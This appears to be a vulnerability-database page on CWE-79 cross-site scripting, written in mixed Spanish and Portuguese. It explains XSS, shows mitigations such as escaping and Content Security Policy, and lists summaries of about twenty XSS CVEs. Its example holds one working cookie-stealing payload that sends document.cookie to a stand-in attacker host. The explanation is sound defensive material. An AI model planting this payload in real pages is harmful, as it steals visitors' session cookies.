Fallos del tipo CWE-79

29.215 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2023-32291MEDIUMWordPress MonsterInsights Pro Plugin <= 8.14.1 is vulnerable to Cross Site Scripting (XSS)EPSS 0.5%CVE-2023-48255MEDIUMThe vulnerability allows an unauthenticated remote attacker to send malicious network requests containing arbitrary client-side script code EPSS 0.5%CVE-2025-31675MEDIUMDrupal core - Moderately critical - Cross Site Scripting - SA-CORE-2025-004EPSS 0.5%CVE-2024-0838MEDIUMHappy Addons for Elementor <= 3.10.1 - Authenticated (Contributor+) Stored Cross-Site ScriptingEPSS 0.5%CVE-2025-0475HIGHImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in GitLabEPSS 0.5%CVE-2023-46722MEDIUMPimcore Admin Classic Bundle Cross-site Scripting (XSS) in PDF previewsEPSS 0.5%CVE-2026-56397CRITICALSiYuan - Remote Code Execution via Malicious Bazaar Package Metadata and READMEEPSS 0.5%CVE-2024-6212MEDIUMSourceCodester Simple Student Attendance System student_form.php get_student cross site scriptingEPSS 0.5%CVE-2021-40289MEDIUMmm-wki v0.2.1 is vulnerable to Cross Site Scripting (XSS).EPSS 0.5%CVE-2022-45769MEDIUMA cross-site scripting (XSS) vulnerability in ClicShopping_V3 v3.402 allows attackers to execute arbitrary web scripts or HTML via a craftedEPSS 0.5%CVE-2022-43076MEDIUMA cross-site scripting (XSS) vulnerability in /admin/edit-admin.php of Web-Based Student Clearance System v1.0 allows attackers to execute aEPSS 0.5%CVE-2024-9101LOWphpLDAPadmin: Reflected Cross-Site Scripting in entry_chooser.phpEPSS 0.5%CVE-2023-36816MEDIUMCross-Site Scripting (XSS) at Account creation in 2FAuthEPSS 0.5%CVE-2024-30885MEDIUMReflected Cross-Site Scripting (XSS) vulnerability in HadSky v7.6.3, allows remote attackers to execute arbitrary code and obtain sensitive EPSS 0.5%CVE-2023-5715MEDIUMWebsite Optimization – Plerdy <= 1.3.2 - Authenticated (Admin+) Stored Cross-Site ScriptingEPSS 0.5%CVE-2026-42524HIGHJenkins HTML Publisher Plugin 427 and earlier does not escape job name and URL in the legacy wrapper file, resulting in a stored cross-site EPSS 0.5%CVE-2022-45285MEDIUMVsourz Digital Advanced Contact form 7 DB Versions 1.7.2 and 1.9.1 is vulnerable to Cross Site Scripting (XSS).EPSS 0.5%CVE-2024-0612MEDIUMContent Views <= 3.6.2 - Authenticated(Administrator+) Stored Cross-Site Scripting via settingsEPSS 0.5%CVE-2024-24388MEDIUMCross-site scripting (XSS) vulnerability in XunRuiCMS versions v4.6.2 and before, allows remote attackers to obtain sensitive information viEPSS 0.5%CVE-2023-3532HIGHCross-site Scripting (XSS) - Stored in outline/outlineEPSS 0.5%